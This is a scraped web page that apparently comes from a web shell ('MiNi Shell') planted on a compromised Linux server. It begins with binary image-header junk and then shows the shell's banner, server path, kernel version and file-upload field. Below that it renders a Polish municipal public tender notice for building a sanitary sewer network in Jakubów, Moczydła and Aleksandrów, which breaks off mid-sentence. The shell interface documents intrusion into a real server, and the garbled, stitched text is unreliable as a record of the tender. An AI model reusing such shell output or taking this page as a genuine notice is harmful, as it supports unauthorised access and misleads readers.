JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220118/0002419801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Postępowanie o udzielenie zamówienia klasycznego w trybie podstawowym na Budowę sieci kanalizacji sanitarnej w miejscowości Jakubów, Moczydła <br/>i Aleksandrów, gmina Jakubów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Jakubów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582718</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mińska 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jakubów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-306</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@jakubow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jakubow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Postępowanie o udzielenie zamówienia klasycznego w trybie podstawowym na Budowę sieci kanalizacji sanitarnej w miejscowości Jakubów, Moczydła <br/>i Aleksandrów, gmina Jakubów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2739a9b3-785b-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00024198</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00010322/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa kanalizacji sanitarnej w miejscowości Jakubów, Moczydła i Aleksandrów, gmina Jakubów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Inwestycja realizowana jest przy pomocy środków z Rządowego Funduszu Polski Ład Program Inwestycji Strategicznych. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.jakubow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">przetargi@jakubow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu mini portalu https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal, oraz poczty elektronicznej email: przetargi@jakubow.pl lub a.wolszczak@jakubow.pl (przy czym ten sposób komunikacji nie jest właściwy dla oferty oraz dokumentów składanych wraz z ofertą)<br/>2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3.	Wymagania techniczne i organizacyjne, wysyłanie i odbieranie dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminu ePUAP.<br/>4.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>5.	Za datę przekazania oferty, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>6.	Identyfikator postępowania i klucz publiczny dla danego postępowania o udzielenie zamówienia dostępne są na Liście wszystkich postępowań na miniPortalu.<br/>7.	We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się nr ogłoszenia (BZP, TED lub ID postępowania).<br/>8.	Jeżeli zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną, każda ze stron na żądanie drugiej strony niezwłocznie potwierdza fakt ich otrzymania;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Oświadczenie RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BiF.271.2.2022.AW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Budowa sieci kanalizacji sanitarnej w miejscowości Jakubów, Moczydła i Aleksandrów, gmina Jakubów.<br/>Roboty budowlane muszą być wykonane zgodnie z:<br/>a.	dokumentacją projektową,<br/>b.	Szczegółową Specyfikacją Techniczną Wykonania i Odbioru Robót<br/>c.	przedmiarem robót,<br/>d.	obowiązującymi przepisami<br/>e.	normami oraz zasadami wiedzy technicznej i sztuki budowlanej.<br/>Obmiary robót zawarte w przedmiarze mają wyłącznie charakter informacyjny (pomocniczy). Dla potrzeb wyceny i późniejszej realizacji udostępniana dokumentacja techniczna j.w. opisująca przedmiot zamówienia musi być przez Wykonawcę rozpatrywana łącznie. Wykonawca zobowiązany jest do kompleksowego zrealizowania zamówienia w zakresie wszystkich prac wynikających z w/w dokumentacji technicznej. Wykonawca zobowiązany jest przewidzieć wszystkie niezbędne koszty i prace do kompleksowego zrealizowania zamówienia wynikające wprost z dokumentacji technicznej, SWZ, jak również koszty w nich ujęte, bez których nie można wykonać zamówienia lub przystąpić do użytkowania. <br/>•	Wykonawca ma obowiązek zapoznać się dokładanie z w/w dokumentacją oraz całą SWZ wraz z jej załącznikami,<br/>• zaleca się, aby przed sporządzeniem oferty Wykonawca zapoznał się z miejscem przyszłych robót budowlanych, <br/>• wymagana jest należyta staranność przy realizacji zamówienia.<br/><br/><br/><br/>Zakres robót objętych SSTWiOR<br/>Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z Budową sieci kanalizacji sanitarnej w miejscowości Jakubów, Moczydła i Aleksandrów, gmina Jakubów<br/>Zakres stosowania dotyczy wszystkich czynności umożliwiających i mających na celu Budowę sieci kanalizacji sanitarnej w miejscowości Jakubów, Moczydła i Aleksandrów, gmina Jakubów<br/><br/>1. Przedmiot inwestycji obejmuje: budowę kanalizacji sanitarnej wraz z pompowniami ścieków oraz<br/>robotami przygotowawczymi i odtworzeniowymi w miejscowościach:<br/> JAKUBÓW<br/>działki numer ewidencyjny - 764, <br/>MOCZYDŁA<br/>działki numer ewidencyjny - 367, 349, 214, 368, 369, 340, 341, 342, 343/7, 344, 345/1<br/>ALEKSANDRÓW<br/>działki numer ewidencyjny - 515, 133, 185, 512, 487, 488, 517/2, 517/1, 407/1<br/><br/>Zakres robót do wykonania obejmuje:<br/>- kanał grawitacyjny PVC SN8 DN200 - 7365,5 m,<br/>- kanał tłoczny PE PN10 DN90 - 930,0 m,<br/>- kanał tłoczny PE PN10 DN110 - 1090,0 m<br/>- pompownia P1 Ø 1,2 m z 2 pomp. MSV-80-14H /typ przejezdny/ – 1 kpl.,<br/>- pompownia P2 Ø 1,2 m z 2 pomp. MSV-80-32 /typ przejezdny/ – 1 kpl.,<br/>- pompownia P3 Ø 1,2 m z 2 pomp. MSV-80-32 /typ przejezdny/ – 1 kpl.,<br/>- pompownia P4 Ø 1,2 m z 2 pomp. MSV-80-14M /typ przejezdny/ – 1 kpl.,<br/>- szczegółowy zakres i opis przedmiotu zamówienia określony jest w przedmiarze robót.<br/><br/>W zakres realizacji przedmiotu zamówienia wchodzi także:<br/> - pełna obsługa geodezyjna budowy na każdym jej etapie (wytyczenie, ewentualne wskazanie granic, inwentaryzacja powykonawcza, szkice i zestawienia)<br/>- zapewnienie fachowego nadzoru nad robotami w zakresie odtwarzania nawierzchni drogowych,<br/>- zabezpieczenie bezpieczeństwa ruchu drogowego i pieszego w czasie prowadzonych robót poprzez opracowanie tymczasowego projektu organizacji ruchu na drogach powiatowych wraz z niezbędnymi uzgodnieniami i zezwoleniami, oraz jej wprowadzenie na czas prowadzonych robót, uzyskanie zgody na zajęcie pasa drogowego oraz poniesienie kosztów z tym związanych. Wykonawca jest zobowiązany do wykonania i utrzymania na własny koszt wykonanego oznakowania tymczasowego robót przez cały okres realizacji, a także jego demontażu po zakończeniu robót,<br/>- odtworzenie nawierzchni drogowych i chodników oraz terenów zielonych do stanu poprzedniego,<br/>- dopełnienie wszelkich zaleceń wynikających z wszystkich uzgodnień branżowych projektu, w tym czynności formalno-prawnych,<br/>- ogrodzenie i oznakowanie terenu budowy oraz odpowiedniego oznakowania i zabezpieczenia miejsc prowadzenia robót, wygrodzenia stref niebezpiecznych zgodnie z obowiązującymi przepisami, zapewnienia zgodnych z przepisami prawa warunków bhp i ppoż.,<br/>- zorganizowanie i przeprowadzenie (na własny koszt): - wszelkich określonych w STWiORB badań zagęszczenia gruntu i podłoża oraz innych niezbędnych prób, badań i odbiorów wraz ze sporządzeniem dokumentacji odbiorczej dla zakresu robót objętych przedmiotem przetargu,<br/>- przeprowadzeniem rozruchów technologicznych przepompowni, oraz wszelkich czynności związanych z przekazaniem do eksploatacji (w tym opracowanie instrukcji eksploatacji, przeszkolenie pracowników Zamawiającego obsługujących przepompownie),<br/>- opracowanie dokumentacji powykonawczej, tj.:<br/>	inwentaryzację geodezyjną i uzyskanie pozytywnej weryfikacji w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej map powykonawczych i szkiców z inwentaryzacji geodezyjnej wykonanych robót, <br/>	wymagane protokoły branżowe, <br/>	protokoły z badania zagęszczenia gruntu, <br/>	komplet instrukcji użytkowania obiektów, urządzeń, <br/>	komplet kart gwarancyjnych urządzeń, <br/>	komplet atestów, deklaracji, aprobat i dopuszczeń, <br/>	komplet dokumentacji techniczno - ruchowej dla zastosowanych urządzeń, <br/>	wymagane protokoły z badań i sprawdzeń, <br/>	wymagane protokoły z zarządów dróg, <br/>	dziennik budowy i książki obmiarów (oryginały), <br/>	dokumentacja powykonawcza wraz z naniesionymi zmianami, dokonanymi w trakcie budowy, potwierdzonymi przez Kierownika Budowy, Inspektora Nadzoru i Projektanta, <br/>	oświadczenie Kierownika budowy o zgodności wykonania obiektu z projektem budowlanym, warunkami pozwolenia (zezwolenia) na budowę, obowiązującymi przepisami i Polskimi Normami, <br/>	do odbioru końcowego Zamawiający wymaga załączenia protokołu wraz filmem (na płycie CD lub innym nośniku elektronicznym) i opisem z badań przeprowadzonych kamerą telewizyjną. Na filmie winien być także zapisany spadek podłużny rejestrowany pomiędzy studniami rewizyjnymi. W komplecie Wykonawca musi załączyć plan orientacyjny umożliwiający dokładne umiejscowienie filmowanych odcinków kanalizacji,<br/>	pozostała dokumentacja, niezbędna do oddania inwestycji do użytkowania,<br/>- przeprowadzenie, po zakończeniu robót zlikwidowanie zaplecza budowy oraz uporządkowanie <br/> terenu.<br/>2. Zamawiający wymaga od Wykonawcy udzielenia gwarancji jakości na zrealizowany przedmiot <br/> Zamówienia – 36 miesięcy.<br/> Okres gwarancji liczony będzie od dnia odebrania przez Zamawiającego robót budowlanych <br/> i podpisania bez uwag protokołu odbioru końcowego przedmiotu zamówienia.<br/>3. Podane w opisach przedmiotu zamówienia nazwy własne nie mają na celu naruszenia art. 99 <br/> ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu technologicznego i wydajnościowego.<br/>4. Zamawiający stosownie do art. 95 ust. 1 ustawy Pzp, określa obowiązek zatrudnienia na podstawie <br/> stosunku pracy osób wykonujących czynności w zakresie realizacji zamówienia określone w ust. 1 <br/> opisu przedmiotu zamówienia jeżeli wykonywanie tych czynności będzie w przypadku danego <br/> wykonawcy polegało na wykonywaniu pracy w rozumieniu przepisów art.22 § 1 kodeksu pracy.<br/> Wykonawca jest zobowiązany do złożenia w dniu zawarcia umowy oświadczenia<br/> potwierdzającego zatrudnienie pracowników, o których mowa powyżej , na podstawie <br/> art.22 § 1 Kodeksu Pracy.<br/>5. Wykonawca, w terminie do 7 dni od dnia zawarcia umowy, przedstawi Zamawiającemu wykaz <br/> osób biorących udział w realizacji zamówienia wraz ze wskazaniem czynności, jakie osoby te będą <br/> wykonywać oraz informacją o sposobie zatrudnienia tych osób.<br/>6. Wykonawca zobowiązany jest do informowania Zamawiającego o każdym przypadku zmiany osób <br/> wykonujących czynności wymienione w ust. 4 lub zmiany sposobu zatrudnienia tych osób, nie <br/> później niż w terminie 7 dni od dokonania takiej zmiany.<br/> 7. Każdorazowa zmiana wykazu osób o którym mowa w ust. 4 nie wymaga aneksu do niniejszej <br/> umowy.<br/> 8. Zamawiający zastrzega sobie prawo do kontrolowania wypełniania przez Wykonawcę obowiązku, o którym mowa w ust. 3, na miejscu realizacji zamówienia w celu weryfikacji czy osoby wykonujące czynności przy realizacji zamówienia są osobami wskazanymi przez wykonawcę w wykazie o którym mowa w ust. 4. Podczas kontroli osoby oddelegowane przez Wykonawcę zobowiązane są do podania imienia i nazwiska wyznaczonemu pracownikowi Zamawiającego. W razie odmowy podania danych umożliwiających identyfikację osób wykonujących zamówienie, Zamawiający wzywa Wykonawcę do pisemnego oświadczenia wskazującego dane osób, które odmówiły podania imienia i nazwiska podczas Kontroli Zamawiającego.<br/>9. Zamawiający ma prawo zwrócić się do Państwowej Inspekcji Pracy o wykonanie czynności w ramach ustawowych kompetencji w celu sprawdzenia/kontroli zatrudnienia przez Wykonawcę lub przez Podwykonawcę osób na umowę o pracę przy czynnościach o których mowa w ust. 5.<br/>10. W przypadku niewywiązania się z obowiązków, o których mowa w ust. 4-6, Wykonawca zobowiązany będzie do zapłaty kary, o których mowa odpowiednio w niniejszej umowie.<br/>11. Obowiązek ten dotyczy także podwykonawców – wykonawca zobowiązany jest zawrzeć w każdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o pracę osób wykonujących wskazane czynności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 – 455 ustawy prawo zamówień publicznych oraz wskazanym we wzorze umowy stanowiącym załącznik do SWZ.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Wykonawca zobowiązany jest do wypełnienia formularza ofertowego (załącznika do SWZ) podania ceny oferty - kwotę brutto w złotych polskich. <br/>2.	Zamawiający nie dopuszcza rozliczeń w walutach obcych.<br/>3.	Cena winna być zaokrąglona do dwóch miejsc po przecinku. Zaokrąglenia należy dokonywać zgodnie z regułą matematyczną (zasada zaokrąglenia – poniżej 5 należy końcówkę pominąć, powyżej i równe 5 należy zaokrąglić w górę).<br/>4.	Cena musi być podana cyfrowo i słownie, z wyodrębnieniem należnego VAT. Cena podana w ofercie powinna obejmować wszystkie koszty i składniki związane z wykonaniem zamówienia, przy zastosowaniu należnego VAT.<br/>5.	Prawidłowe ustalenie VAT należy do obowiązku Wykonawcy.<br/>6.	Cena oferty powinna być obliczona przez Wykonawcę na podstawie szczegółowego opisu przedmiotu zamówienia z uwzględnieniem wytycznych określonych w niniejszej SWZ.<br/>7.	Cena oferty musi zawierać wszelkie koszty niezbędne do zrealizowania zamówienia, wynikające wprost z opisu przedmiotu zamówienia, jak również w nim nieujęte, a bez których nie można wykonać zamówienia tj. koszty organizacji, obsługi, ubezpieczenia i innych wynikających z umowy.<br/>8.	Wykonawcy przysługiwać będzie wynagrodzenie zgodnie ze złożoną ofertą. <br/>9.	Zaleca się Wykonawcom sprawdzenie w terenie warunków wykonania zamówienia w celu zminimalizowania ryzyka związanego z faktycznym rozmiarem prac niezbędnych do wykonania zamówienia.<br/>10.	Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia.<br/>11.	Jeżeli złożono ofertę, której wybór prowadziłby do powstania obowiązku podatkowego Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi przepisami. Wykonawca, składając ofertę, informuje Zamawiającego, czy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) usług, których świadczenie będzie prowadzić do jego powstania oraz wskazując ich wartość bez kwoty podatku. W takim przypadku Wykonawca sporządzi stosowne oświadczenie. Jeżeli Wykonawca nie złoży żadnego oświadczenia w tym zakresie Zamawiający uzna, że wybór oferty Wykonawcy nie będzie prowadził do powstania obowiązku podatkowego Zamawiającego.<br/>12. W toku badania i oceny ofert zamawiający może żądać od wykonawcy wyjaśnień dotyczących treści złożonych ofert oraz przedmiotowych środków dowodowych lub innych składanych dokumentów lub oświadczeń. Niedopuszczalne jest prowadzenie między zamawiającym a wykonawcą negocjacji dotyczących złożonej oferty oraz dokonywanie jakiejkolwiek zmiany w jej treści za wyjątkiem omyłek pisarskich i rachunkowych. <br/>13. Zamawiający poprawia w tekście oferty oczywiste omyłki pisarskie oraz oczywiste omyłki <br/> rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek, inne omyłki <br/> polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian <br/> w treści oferty, niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>•	nie podlegają 